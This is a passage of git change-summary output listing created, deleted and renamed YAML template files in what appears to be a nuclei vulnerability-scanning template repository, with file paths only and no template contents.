nuclei-templates/Other/graphql-detect-7829.yaml delete mode 100644 nuclei-templates/Other/graphql-detect-7830.yaml rename nuclei-templates/Other/{graphql-field-suggestion-7834.yaml => graphql-field-suggestion.yaml} (100%) delete mode 100644 nuclei-templates/Other/graphql-get-method-7835.yaml create mode 100644 nuclei-templates/Other/graphql-get-method-7836.yaml delete mode 100644 nuclei-templates/Other/grav-cms-detect-7844.yaml create mode 100644 nuclei-templates/Other/grav-cms-detect.yaml create mode 100644 nuclei-templates/Other/graylog-api-browser-7846.yaml delete mode 100644 nuclei-templates/Other/graylog-api-browser.yaml delete mode 100644 nuclei-templates/Other/groovy-console-open.yaml create mode 100644 nuclei-templates/Other/groupoffice-lfi-7849.yaml delete mode 100644 nuclei-templates/Other/groupoffice-lfi-7851.yaml delete mode 100644 nuclei-templates/Other/gsoap-lfi-7853.yaml create mode 100644 nuclei-templates/Other/gsoap-lfi-7855.yaml rename nuclei-templates/Other/{GT-AC2900-login.yaml => gt-ac2900-login.yaml} (100%) rename nuclei-templates/Other/{h2csmuggle-upgrade-only-nuclei.yaml => h2csmuggle-nuclei.yaml} (100%) create mode 100644 nuclei-templates/Other/h3c-imc-rce-7871.yaml delete mode 100644 nuclei-templates/Other/h3c-imc-rce.yaml delete mode 100644 nuclei-templates/Other/hadoop-exposure-7872.yaml create mode 100644 nuclei-templates/Other/hadoop-exposure-7874.yaml rename nuclei-templates/Other/{hadoop-unauth.yaml => hadoop-unauth-7877.yaml} (100%) create mode 100644 nuclei-templates/Other/hanming-lfr-7880.yaml delete mode 100644 nuclei-templates/Other/hanming-lfr.yaml create mode 100644 nuclei-templates/Other/haproxy-status-7883.yaml delete mode 100644 nuclei-templates/Other/haproxy-status-7885.yaml rename nuclei-templates/Other/{harbor-workflow-7889.yaml => harbor-workflow.yaml} (100%) rename nuclei-templates/Other/{hashicorp-consul-webgui-7896.yaml => hashicorp-consul-webgui.yaml} (100%) delete mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec-7901.yaml create mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec.yaml create mode 100644 nuclei-templates/Other/hasura-graphql-ssrf-7905.yaml delete mode 100644 nuclei-templates/Other/hasura-graphql-ssrf.yaml create mode 100644 nuclei-templates/Other/hatenablog-takeover-7908.yaml delete mode 100644 nuclei-templates/Other/hatenablog-takeover-7910.yaml create mode 100644 nuclei-templates/Other/header-blind-time-sql-injection.yaml delete mode 100644 nuclei-templates/Other/header-injection(1).yaml rename nuclei-templates/Other/{helpjuice-takeover.yaml => helpjuice-takeover-7928.yaml} (100%) delete mode 100644 nuclei-templates/Other/hiboss-rce-7949.yaml create mode 100644 nuclei-templates/Other/hiboss-rce.yaml rename nuclei-templates/Other/{hivemanager-login-panel-7963.yaml => hivemanager-login-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read-7971.yaml create mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read.yaml create mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7976.yaml delete mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read.yaml create mode 100644 nuclei-templates/Other/hmc-hybris-panel-7977.yaml delete mode 100644 nuclei-templates/Other/hmc-hybris-panel-7978.yaml delete mode 100644 nuclei-templates/Other/home-assistant-7979.yaml create mode 100644 nuclei-templates/Other/home-assistant-7980.yaml delete mode 100644 nuclei-templates/Other/honeywell-building-control-7987.yaml create mode 100644 nuclei-templates/Other/honeywell-building-control.yaml rename nuclei-templates/Other/{honeywell-web-controller-7995.yaml => honeywell-web-controller.yaml} (100%) delete mode 100644 nuclei-templates/Other/hongdian-default-login-7998.yaml create mode 100644 nuclei-templates/Other/hongdian-default-login-7999.yaml delete mode 100644 nuclei-templates/Other/horizon.yaml rename nuclei-templates/Other/{host-header-poisoning.yaml => hostheaderpoisoning.yaml} (100%) rename nuclei-templates/Other/{hp-color-laserjet-detect.yaml => hp-color-laserjet-detect-8006.yaml} (100%) rename nuclei-templates/Other/{hp-device-info-detect-8010.yaml => hp-device-info-detect-8009.yaml} (100%) rename nuclei-templates/Other/{hp-ilo-serial-key-disclosure-8023.yaml => hp-ilo-serial-key-disclosure-8024.yaml} (100%) rename nuclei-templates/Other/{hp-laserjet-detect-8027.yaml => hp-laserjet-detect-8028.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-service-manager-8033.yaml create mode 100644 nuclei-templates/Other/hp-service-manager-8034.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-anonymous-8011.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-anonymous.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-login-8014.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-login.yaml rename nuclei-templates/Other/{hsort-fileread.yaml => hsort-fileRead.yaml} (100%) rename nuclei-templates/Other/{hst-fileread.yaml => hst-fileRead.yaml} (100%) rename nuclei-templates/Other/{htaccess-config.yaml => htaccess-config-8043.yaml} (100%) delete mode 100644 nuclei-templates/Other/htpasswd-detection.yaml create mode 100644 nuclei-templates/Other/htpasswd.yaml rename nuclei-templates/Other/{http-missing-security-headers.yaml => http-missing-security-headers-8058.yaml} (100%) rename nuclei-templates/Other/{http-raw.yaml => http-raw-multiple.yaml} (100%) rename nuclei-templates/Other/{http-hsts-header.yaml => http-xframe-header.yaml} (100%) create mode 100644 nuclei-templates/Other/httpbin-open-redirect-8048.yaml delete mode 100644 nuclei-templates/Other/httpbin-open-redirect-8049.yaml rename nuclei-templates/Other/{httpbin-panel-8050.yaml => httpbin-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/httpbin-xss-8052.yaml create mode 100644 nuclei-templates/Other/httpbin-xss.yaml rename nuclei-templates/Other/{dahua-publishing-fileupload.yaml => huatian-oa-upload-file-upload.yaml} (100%) rename nuclei-templates/Other/{huawei-hg532e-default-router-login-8063.yaml => huawei-HG532e-default-router-login.yaml} (100%) create mode 100644 nuclei-templates/Other/huawei-hg659-lfi-8067.yaml delete mode 100644 nuclei-templates/Other/huawei-hg659-lfi-8069.yaml create mode 100644 nuclei-templates/Other/huawei-home-gateway-8072.yaml delete mode 100644 nuclei-templates/Other/huawei-home-gateway.yaml rename nuclei-templates/Other/{huawei-router-auth-bypass.yaml => huawei-router-auth-bypass-8073.yaml} (100%) create mode 100644 nuclei-templates/Other/hubspot-takeover-8078.yaml delete mode 100644 nuclei-templates/Other/hubspot-takeover-8079.yaml delete mode 100644 nuclei-templates/Other/hue-default-credential-8080.yaml create mode 100644 nuclei-templates/Other/hue-default-credential-8081.yaml rename nuclei-templates/Other/{huijietong-cloud-fileread-8084.yaml => huijietong-cloud-fileread-8082.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-advanced-system-management-8088.yaml create mode 100644 nuclei-templates/Other/ibm-advanced-system-management-8090.yaml delete mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure-8093.yaml create mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure.yaml delete mode 100644 nuclei-templates/Other/ibm-http-server-8095.yaml create mode 100644 nuclei-templates/Other/ibm-http-server-8097.yaml create mode 100644 nuclei-templates/Other/ibm-infoprint-lfi-8105.yaml delete mode 100644 nuclei-templates/Other/ibm-infoprint-lfi.yaml rename nuclei-templates/Other/{ibm-mqseries-web-console.yaml => ibm-mqseries-web-console-8109.yaml} (100%) create mode 100644 nuclei-templates/Other/ibm-note-login-8112.yaml delete mode 100644 nuclei-templates/Other/ibm-note-login.yaml create mode 100644 nuclei-templates/Other/ibm-security-access-manager-8113.yaml delete mode 100644 nuclei-templates/Other/ibm-security-access-manager.yaml create mode 100644 nuclei-templates/Other/ibm-service-assistant-8118.yaml delete mode 100644 nuclei-templates/Other/ibm-service-assistant.yaml rename nuclei-templates/Other/{iceflow-vpn-disclosure-8127.yaml => iceflow-vpn-disclosure-8128.yaml} (100%) create mode 100644 nuclei-templates/Other/icewarp-open-redirect.yaml delete mode 100644 nuclei-templates/Other/icewarp-openredirects.yaml rename nuclei-templates/Other/{idemia-biometrics-default-login-8141.yaml => idemia-biometrics-default-login.yaml} (100%) rename nuclei-templates/Other/{identity-services-engine-8146.yaml => identity-services-engine-8147.yaml} (100%) delete mode 100644 nuclei-templates/Other/identityguard-selfservice-entrust-8142.yaml rename nuclei-templates/Other/{idor-vuln-params(1).yaml => idor-vuln-params.yaml} (100%) create mode 100644 nuclei-templates/Other/iis-errorpage-detection-all-lang.yaml rename nuclei-templates/Other/{iis-shortname-8153.yaml => iis-shortname-8151.yaml} (100%) rename nuclei-templates/Other/{ilo-detect-8155.yaml => ilo-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/improper-bucket-sse.yaml create mode 100644 nuclei-templates/Other/infinitt-pacs-file-upload.yaml create mode 100644 nuclei-templates/Other/infinitt-pacs-info-leak.yaml rename nuclei-templates/Other/{influxdb-detect.yaml => influxdb-detect-8160.yaml} (100%) create mode 100644 nuclei-templates/Other/insecure-provider-path.yaml create mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login-8162.yaml delete mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login.yaml rename nuclei-templates/Other/{intelbras-login-8163.yaml => intelbras-login.yaml} (100%) rename nuclei-templates/Other/{interactsh-server.yaml => interactsh-server-8165.yaml} (100%) rename nuclei-templates/Other/{intercom-takeover-8169.yaml => intercom-takeover.yaml} (100%) delete mode 100644 nuclei-templates/Other/interlib-fileread-8172.yaml create mode 100644 nuclei-templates/Other/interlib-fileread.yaml rename nuclei-templates/Other/{internet-service-8178.yaml => internet-service-8177.yaml} (100%) rename nuclei-templates/Other/{iomega-emc-shared-nas.yaml => iomega-emc-shared-nas-8181.yaml} (100%) rename nuclei-templates/Other/{ioncube-loader-wizard.yaml => ioncube-loader-wizard-8184.yaml} (100%) rename nuclei-templates/Other/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8186.yaml} (100%) rename nuclei-templates/Other/{iplanet-web-server-8191.yaml => iplanet-web-server-8190.yaml} (100%) delete mode 100644 nuclei-templates/Other/ipstack.yaml rename nuclei-templates/Other/{iptime-default-login.yaml => iptime-default-login-8194.yaml} (100%) delete mode 100644 nuclei-templates/Other/iptime-router-8195.yaml create mode 100644 nuclei-templates/Other/iptime-router.yaml rename nuclei-templates/{wordpress/issuu-panel-lfi-8197.yaml => Other/issuu-panel-lfi.yaml} (100%) rename nuclei-templates/Other/{email.yaml => iterate-values-flow.yaml} (100%) rename nuclei-templates/Other/{itop-panel.yaml => itop-panel-8205.yaml} (100%) delete mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce-8212.yaml create mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce-8214.yaml rename nuclei-templates/Other/{jamf-panel-8216.yaml => jamf-panel-8215.yaml} (100%) delete mode 100644 nuclei-templates/Other/jaspersoft-detect-8218.yaml create mode 100644 nuclei-templates/Other/jaspersoft-detect.yaml delete mode 100644 nuclei-templates/Other/java-rmi-detect-8228.yaml create mode 100644 nuclei-templates/Other/java-rmi-detect.yaml create mode 100644 nuclei-templates/Other/jboss-detect-8237.yaml delete mode 100644 nuclei-templates/Other/jboss-detect.yaml rename nuclei-templates/Other/{jboss-status-8243.yaml => jboss-web-console.yaml} (100%) mode change 100644 => 100755 nuclei-templates/Other/jdbc-connection-string-8244.yaml rename nuclei-templates/Other/{jeedom-detect-8249.yaml => jeedom-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/jeewms-lfi-8254.yaml delete mode 100644 nuclei-templates/Other/jeewms-lfi-8255.yaml rename nuclei-templates/Other/{jellyfin-detect-8258.yaml => jellyfin-detect.yaml} (100%) rename nuclei-templates/Other/{jenkins-api-panel.yaml => jenkins-api-panel-8263.yaml} (100%) delete mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8264.yaml create mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8266.yaml rename nuclei-templates/Other/{jenkins-weak-password.yaml => jenkins-default-8272.yaml} (100%) create mode 100644 nuclei-templates/Other/jenkins-detect-8275.yaml delete mode 100644 nuclei-templates/Other/jenkins-detect.yaml delete mode 100644 nuclei-templates/Other/jenkins-login-detection.yaml create mode 100644 nuclei-templates/Other/jenkins-login.yaml create mode 100644 nuclei-templates/Other/jenkins-script-8281.yaml delete mode 100644 nuclei-templates/Other/jenkins-script-8284.yaml create mode 100644 nuclei-templates/Other/jenkins-stack-trace-8285.yaml delete mode 100644 nuclei-templates/Other/jenkins-stack-trace.yaml create mode 100644 nuclei-templates/Other/jenkins-unauthenticated.yaml delete mode 100644 nuclei-templates/Other/jetbrains-datasources-8291.yaml create mode 100644 nuclei-templates/Other/jetbrains-datasources.yaml rename nuclei-templates/Other/{jetty-showcontexts-enable.yaml => jetty-showcontexts-enable-8295.yaml} (100%) delete mode 100644 nuclei-templates/Other/jfrog-8303.yaml create mode 100644 nuclei-templates/Other/jfrog-8306.yaml rename nuclei-templates/Other/{jfrog-unauth-build-exposed-8302.yaml => jfrog-unauth-build-exposed.yaml} (100%) delete mode 100644 nuclei-templates/Other/jinfornet-jreport-lfi-8308.yaml create mode 100644 nuclei-templates/Other/jinfornet-jreport-lfi.yaml rename nuclei-templates/Other/{jinher-oa-default-login-8311.yaml => jinher-oa-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/jira-detect-8314.yaml delete mode 100644 nuclei-templates/Other/jira-detect-8315.yaml create mode 100644 nuclei-templates/Other/jira-login-check.yaml delete mode 100644 nuclei-templates/Other/jira-login-default.yaml rename nuclei-templates/Other/{jira-service-desk-signup.yaml => jira-service-desk-signup-8321.yaml} (100%) delete mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards-8327.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-installed-gadgets-8328.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-installed-gadgets.yaml rename nuclei-templates/Other/{jira-unauthenticated-projectcategories.yaml => jira-unauthenticated-projectcategories-8334.yaml} (100%) rename nuclei-templates/Other/{jira-unauthenticated-screens-8338.yaml => jira-unauthenticated-screens.yaml} (100%) delete mode 100644 nuclei-templates/Other/jkstatus-manager-8346.yaml create mode 100644 nuclei-templates/Other/jkstatus-manager-8347.yaml rename nuclei-templates/Other/{jmx-console-8348.yaml => jmx-console.yaml} (100%) rename nuclei-templates/Other/{jmx-default-login-8355.yaml => jmx-default-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/jolokia-list-8361.yaml create mode 100644 nuclei-templates/Other/jolokia-list.yaml create mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi-8365.yaml delete mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi.yaml rename nuclei-templates/Other/{jolokia-8369.yaml => jolokia.yaml} (100%) create mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8371.yaml delete mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8373.yaml rename nuclei-templates/Other/{joomla-config-file-8376.yaml => joomla-config-file-8377.yaml} (100%) delete mode 100644 nuclei-templates/Other/joomla-file-listing-8379.yaml create mode 100644 nuclei-templates/Other/joomla-file-listing-8380.yaml create mode 100644 nuclei-templates/Other/joomla-htaccess-8383.yaml delete mode 100644 nuclei-templates/Other/joomla-htaccess.yaml delete mode 100644 nuclei-templates/Other/joomla-manifest-file-8388.yaml create mode 100644 nuclei-templates/Other/joomla-manifest-file.yaml delete mode 100644 nuclei-templates/Other/joomla-panel-8391.yaml create mode 100644 nuclei-templates/Other/joomla-panel-8392.yaml delete mode 100644 nuclei-templates/Other/joomla-workflow-8393.yaml create mode 100644 nuclei-templates/Other/joomla-workflow-8394.yaml create mode 100644 nuclei-templates/Other/js-analyse.yaml delete mode 100644 nuclei-templates/Other/jsecret.yaml rename nuclei-templates/Other/{jsf-detection.yaml => jsf-detection-8397.yaml} (100%) delete mode 100644 nuclei-templates/Other/jumpcloud.yaml rename nuclei-templates/Other/{jupyter-ipython-unauth.yaml => jupyter-ipython-unauth-8402.yaml} (100%) create mode 100644 nuclei-templates/Other/jupyterhub-default-login-8401.yaml delete mode 100644 nuclei-templates/Other/jupyterhub-default-login.yaml rename nuclei-templates/Other/{jwt-token.yaml => jwt-token-8408.yaml} (100%) delete mode 100644 nuclei-templates/Other/kafdrop-xss-8411.yaml create mode 100644 nuclei-templates/Other/kafdrop-xss-8414.yaml create mode 100644 nuclei-templates/Other/kafka-center-default-login-8417.yaml delete mode 100644 nuclei-templates/Other/kafka-center-default-login.yaml delete mode 100644 nuclei-templates/Other/kafka-center-login-8418.yaml create mode 100644 nuclei-templates/Other/kafka-center-login-8419.yaml rename nuclei-templates/Other/{kafka-connect-ui.yaml => kafka-connect-ui-8423.yaml} (100%) rename nuclei-templates/Other/{kafka-consumer-monitor.yaml => kafka-consumer-monitor-8424.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-topics-ui-8435.yaml delete mode 100644 nuclei-templates/Other/kafka-topics-ui.yaml rename nuclei-templates/Other/{karel-ip-phone-lfi.yaml => karel-ip-phone-lfi-8438.yaml} (100%) delete mode 100644 nuclei-templates/Other/kenesto-login-8444.yaml create mode 100644 nuclei-templates/Other/kenesto-login.yaml rename nuclei-templates/Other/{kentico-login-8446.yaml => kentico-login-8447.yaml} (100%) rename nuclei-templates/Other/{kevinlab-bems-backdoor-8456.yaml => kevinlab-bems-backdoor.yaml} (100%) rename nuclei-templates/Other/{kevinlab-bems-sqli-8457.yaml => kevinlab-bems-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/kevinlab-device-detect-8461.yaml delete mode 100644 nuclei-templates/Other/kevinlab-device-detect.yaml delete mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor-8463.yaml create mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor-8466.yaml delete mode 100644 nuclei-templates/Other/key-cloak-admin-panel-8468.yaml create mode 100644 nuclei-templates/Other/key-cloak-admin-panel.yaml rename nuclei-templates/Other/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%) delete mode 100644 nuclei-templates/Other/keycloak-xss-8480.yaml create mode 100644 nuclei-templates/Other/keycloak-xss-8481.yaml rename nuclei-templates/Other/{kibana-panel-8487.yaml => kibana-panel.yaml} (100%) rename nuclei-templates/Other/{kingdee-eas-directory-traversal.yaml => kingdee-eas-directory-traversal-8489.yaml} (100%) rename nuclei-templates/Other/{kingsoft-v8-file-read.yaml => kingsoft-v8-file-read-8491.yaml} (100%) rename nuclei-templates/Other/{kinsta-takeover-8492.yaml => kinsta-takeover-8494.yaml} (100%) create mode 100644 nuclei-templates/Other/kong-detect-8501.yaml delete mode 100644 nuclei-templates/Other/kong-detect.yaml rename nuclei-templates/Other/{Konga-default-login.yaml => konga-default-login.yaml} (100%) rename nuclei-templates/Other/{kube-api-deployments.yaml => kube-api-deployments-8503.yaml} (100%) create mode 100644 nuclei-templates/Other/kube-api-nodes-8507.yaml delete mode 100644 nuclei-templates/Other/kube-api-nodes-8508.yaml rename nuclei-templates/Other/{kube-api-pods.yaml => kube-api-pods-8509.yaml} (100%) rename nuclei-templates/Other/{kubeflow-dashboard-unauth.yaml => kubeflow-dashboard-unauth-8515.yaml} (100%) delete mode 100644 nuclei-templates/Other/kubelet-metrics-8521.yaml create mode 100644 nuclei-templates/Other/kubelet-metrics.yaml rename nuclei-templates/Other/{kubelet-pods-8523.yaml => kubelet-pods-8522.yaml} (100%) create mode 100644 nuclei-templates/Other/kubernetes-dashboard-enabled.yaml create mode 100644 nuclei-templates/Other/kubernetes-kustomization-disclosure-8532.yaml delete mode 100644 nuclei-templates/Other/kubernetes-kustomization-disclosure.yaml delete mode 100644 nuclei-templates/Other/kubernetes-metrics-8534.yaml create mode 100644 nuclei-templates/Other/kubernetes-metrics-8536.yaml create mode 100644 nuclei-templates/Other/kubernetes-pods-8543.yaml delete mode 100644 nuclei-templates/Other/kubernetes-pods.yaml rename nuclei-templates/Other/{kubernetes-resource-report-8549.yaml => kubernetes-resource-report.yaml} (100%) delete mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8558.yaml create mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi.yaml delete mode 100644 nuclei-templates/Other/lacie-panel-8561.yaml create mode 100644 nuclei-templates/Other/lacie-panel.yaml delete mode 100644 nuclei-templates/Other/lancom-router-panel-8564.yaml create mode 100644 nuclei-templates/Other/lancom-router-panel.yaml rename nuclei-templates/Other/{landray-oa-fileread-8571.yaml => landray-oa-fileread-8570.yaml} (100%) delete mode 100644 nuclei-templates/Other/lansweeper-login-8573.yaml create mode 100644 nuclei-templates/Other/lansweeper-login.yaml delete mode 100644 nuclei-templates/Other/laravel-debug-enabled-8574.yaml create mode 100644 nuclei-templates/Other/laravel-debug-enabled-8577.yaml rename nuclei-templates/Other/{laravel-filemanager.yaml => laravel-filemanager-8591.yaml} (100%) rename nuclei-templates/Other/{laravel-ignition-xss-8593.yaml => laravel-ignition-xss-8592.yaml} (100%) rename nuclei-templates/Other/{laravel-log-file.yaml => laravel-log-file-8595.yaml} (100%) rename nuclei-templates/Other/{laravel-telescope-8600.yaml => laravel-telescope.yaml} (100%) create mode 100644 nuclei-templates/Other/launchrock-takeover-8602.yaml delete mode 100644 nuclei-templates/Other/launchrock-takeover-8605.yaml create mode 100644 nuclei-templates/Other/learnpress.yaml delete mode 100644 nuclei-templates/Other/lfi-linux-fuzz.yaml delete mode 100644 nuclei-templates/Other/lfi.yaml delete mode 100644 nuclei-templates/Other/liferay-portal-detect-8625.yaml create mode 100644 nuclei-templates/Other/liferay-portal-detect-8626.yaml create mode 100644 nuclei-templates/Other/liferay.yaml create mode 100644 nuclei-templates/Other/limit-networkaccess-disabled.yaml rename nuclei-templates/Other/{linkedin-id.yaml => linkedin-client-id.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkerd-badrule-detect-8630.yaml create mode 100644 nuclei-templates/Other/linkerd-badrule-detect.yaml rename nuclei-templates/Other/{linkerd-ssrf-8642.yaml => linkerd-service-detect-8634.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8637.yaml delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8638.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8639.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8640.yaml create mode 100644 nuclei-templates/Other/linux-lfi-fuzz.yaml rename nuclei-templates/Other/{liveview-axis-camera-8648.yaml => liveview-axis-camera-8646.yaml} (100%) rename nuclei-templates/Other/{XVE-2024-2116.yaml => local-file-include.yaml} (100%) create mode 100644 nuclei-templates/Other/local-file-inclusion.yaml rename nuclei-templates/Other/{log4j-fuzz2.yaml => log4j-fuzz-head-poc-v1.yaml} (100%) delete mode 100644 nuclei-templates/Other/log4j-url.yaml create mode 100644 nuclei-templates/Other/log4jshell.yaml delete mode 100644 nuclei-templates/Other/loganalyzer.yaml rename nuclei-templates/Other/{logins (copy 1).yaml => logins.yaml} (100%) rename nuclei-templates/Other/{lotuscms-rce-8653.yaml => lotuscms-rce-8651.yaml} (100%) delete mode 100644 nuclei-templates/Other/lucee-detect-8659.yaml create mode 100644 nuclei-templates/Other/lucee-detect-8661.yaml delete mode 100644 nuclei-templates/Other/lucee-login-8665.yaml create mode 100644 nuclei-templates/Other/lucee-login.yaml delete mode 100644 nuclei-templates/Other/lucee-stack-trace-8667.yaml create mode 100644 nuclei-templates/Other/lucee-stack-trace-8670.yaml create mode 100644 nuclei-templates/Other/maccmsv10-backdoor-8685.yaml delete mode 100644 nuclei-templates/Other/maccmsv10-backdoor.yaml rename nuclei-templates/Other/{magento-2-exposed-api-8687.yaml => magento-2-exposed-api.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-admin-panel-8694.yaml delete mode 100644 nuclei-templates/Other/magento-admin-panel.yaml create mode 100644 nuclei-templates/Other/magento-cacheleak-8696.yaml delete mode 100644 nuclei-templates/Other/magento-cacheleak.yaml delete mode 100644 nuclei-templates/Other/magento-config-8700.yaml create mode 100644 nuclei-templates/Other/magento-config-8702.yaml delete mode 100644 nuclei-templates/Other/magento-config-disclosure.yaml delete mode 100644 nuclei-templates/Other/magento-detect-8706.yaml create mode 100644 nuclei-templates/Other/magento-detect-8707.yaml create mode 100644 nuclei-templates/Other/magento-information-disclosure.yaml rename nuclei-templates/Other/{magento-unprotected-dev-files-8709.yaml => magento-unprotected-dev-files.yaml} (100%) rename nuclei-templates/Other/{adobe-magento.yaml => magento.yaml} (100%) delete mode 100644 nuclei-templates/Other/magicflow-lfi-8710.yaml create mode 100644 nuclei-templates/Other/magicflow-lfi-8712.yaml delete mode 100644 nuclei-templates/Other/magmi-detect-8716.yaml create mode 100644 nuclei-templates/Other/magmi-detect.yaml rename nuclei-templates/Other/{mailgun-api-11855.yaml => mailgun-api(1).yaml} (100%) rename nuclei-templates/Other/{api-mailgun.yaml => mailgun.yaml} (100%) rename nuclei-templates/Other/{manageengine-adselfservice-8738.yaml => manageengine-adselfservice-8736.yaml} (100%) delete mode 100644 nuclei-templates/Other/manageengine-analytics-8743.yaml create mode 100644 nuclei-templates/Other/manageengine-analytics.yaml delete mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk-8747.yaml create mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk.yaml rename nuclei-templates/Other/{manageengine-applications-manager-8751.yaml => manageengine-applications-manager-8752.yaml} (100%) delete mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8757.yaml create mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8758.yaml create mode 100644 nuclei-templates/Other/manageengine-desktop-8761.yaml delete mode 100644 nuclei-templates/Other/manageengine-desktop.yaml rename nuclei-templates/Other/{manageengine-keymanagerplus-8764.yaml => manageengine-keymanagerplus.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-opmanager-8768.yaml delete mode 100644 nuclei-templates/Other/manageengine-opmanager.yaml rename nuclei-templates/Other/{manageengine-servicedesk-8772.yaml => manageengine-servicedesk-8771.yaml} (100%) delete mode 100644 nuclei-templates/Other/manageengine-supportcenter-8776.yaml create mode 100644 nuclei-templates/Other/manageengine-supportcenter.yaml create mode 100644 nuclei-templates/Other/match-1.yaml rename nuclei-templates/Other/{Maticsoft-Shop-sqli.yaml => maticsoft-shop-sqli.yaml} (100%) rename nuclei-templates/Other/{mautic-crm-detect-8788.yaml => mautic-crm-detect-8787.yaml} (100%) rename nuclei-templates/Other/{mcafee-epo-rce-8793.yaml => mcafee-epo-rce-8794.yaml} (100%) create mode 100644 nuclei-templates/Other/medium-takeover-8798.yaml delete mode 100644 nuclei-templates/Other/medium-takeover.yaml create mode 100644 nuclei-templates/Other/meshcentral-login-8803.yaml delete mode 100644 nuclei-templates/Other/meshcentral-login.yaml rename nuclei-templates/Other/{metabase-panel.yaml => metabase-panel-8806.yaml} (100%) rename nuclei-templates/Other/{metadata-aws-8810.yaml => metadata-aws-8811.yaml} (100%) create mode 100644 nuclei-templates/Other/metadata-azure-8813.yaml delete mode 100644 nuclei-templates/Other/metadata-azure-8815.yaml create mode 100644 nuclei-templates/Other/metadata-digitalocean-8817.yaml delete mode 100644 nuclei-templates/Other/metadata-digitalocean-8818.yaml create mode 100644 nuclei-templates/Other/metadata-hetzner-8822.yaml delete mode 100644 nuclei-templates/Other/metadata-hetzner-8824.yaml create mode 100644 nuclei-templates/Other/metadata-openstack-8825.yaml delete mode 100644 nuclei-templates/Other/metadata-openstack-8826.yaml create mode 100644 nuclei-templates/Other/metadata-oracle-8830.yaml delete mode 100644 nuclei-templates/Other/metadata-oracle-8831.yaml rename nuclei-templates/Other/{metatag-cms-8833.yaml => metatag-cms-8832.yaml} (100%) rename nuclei-templates/Other/{metersphere-plugin-rce-8836.yaml => metersphere-plugin-rce-8835.yaml} (100%) delete mode 100644 nuclei-templates/Other/metinfo-lfi-8838.yaml create mode 100644 nuclei-templates/Other/metinfo-lfi-8840.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-panel-8850.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-panel.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8853.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8854.yaml rename nuclei-templates/Other/{microsoft-exchange-workflow.yaml => microsoft-exchange-workflow-8855.yaml} (100%) delete mode 100644 nuclei-templates/Other/microsoft-teams-webhook-8856.yaml create mode 100755 nuclei-templates/Other/microsoft-teams-webhook-8858.yaml delete mode 100644 nuclei-templates/Other/microweber-detect-8863.yaml create mode 100644 nuclei-templates/Other/microweber-detect.yaml rename nuclei-templates/Other/{microweber-xss-8864.yaml => microweber-xss.yaml} (100%) rename nuclei-templates/Other/{mida-eframework-xss-8869.yaml => mida-eframework-xss-8866.yaml} (100%) rename nuclei-templates/Other/{mikrotik-graph-8870.yaml => mikrotik-graph-8871.yaml} (100%) rename nuclei-templates/Other/{mikrotik-routeros-8873.yaml => mikrotik-routeros-8875.yaml} (100%) delete mode 100644 nuclei-templates/Other/minimouse-lfi-8879.yaml create mode 100644 nuclei-templates/Other/minimouse-lfi.yaml delete mode 100644 nuclei-templates/Other/minio-browser-8882.yaml create mode 100644 nuclei-templates/Other/minio-browser-8883.yaml delete mode 100644 nuclei-templates/Other/minio-console-8886.yaml create mode 100644 nuclei-templates/Other/minio-console.yaml rename nuclei-templates/Other/{minio-default-password.yaml => minio-default-password-8891.yaml} (100%) mode change 100644 => 100755 rename nuclei-templates/Other/{minio-detect-8894.yaml => minio-detect-8892.yaml} (100%) create mode 100644 nuclei-templates/Other/minio_fileLeak.yaml rename nuclei-templates/Other/{misconfigured-docker-8900.yaml => misconfigured-docker-8902.yaml} (100%) rename 